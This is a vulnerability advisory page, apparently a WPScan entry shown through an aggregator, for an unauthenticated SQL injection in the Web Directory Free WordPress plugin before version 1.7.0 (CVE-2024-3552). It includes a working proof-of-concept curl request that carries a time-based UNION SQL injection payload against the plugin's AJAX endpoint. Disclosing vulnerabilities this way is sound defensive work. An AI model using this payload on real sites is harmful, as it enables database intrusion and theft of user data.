Lucene search
Simone Onofri, Kim Cerra, Andrea De DominicisWPVDB-ID:34B03EE4-DE81-4FEC-9F3D-E1BD5B94D136HistoryMay 23, 2024 - 12:00 a.m.
Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-05-2300:00:00
Simone Onofri, Kim Cerra, Andrea De Dominicis
wpscan.com
2
web directory free
sql injection
ajax action
unauthenticated users
union
time-based
error-based
update
plugin
0.001 Low
EPSS
Percentile
21.9%
Description The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
PoC
curl --url ‘http://vulnerable-site.tld/wp-admin/admin-ajax.php’ --data ‘action=w2dc_get_map_marker_info&locations;_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users↦_id=1&show;_summary_button=1&show;_readmore_button=1’
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 1.7.0 |
Related
nuclei
nuclei
Web Directory Free < 1.7.0 - SQL Injection
2024-06-13 12:47:43
nvd
nvd
CVE-2024-3552
2024-06-13 06:15:11
cvelist
cvelist
CVE-2024-3552 Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-06-13 06:00:02
vulnrichment
vulnrichment
CVE-2024-3552 Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-06-13 06:00:02
githubexploit
githubexploit
Exploit for CVE-2024-3552
2024-05-27 15:36:24
cve
cve
CVE-2024-3552
2024-06-13 06:15:11
wpexploit
wpexploit
Web Directory Free < 1.7.0 - Unauthenticated SQL Injection
2024-05-23 00:00:00
wordfence
wordfence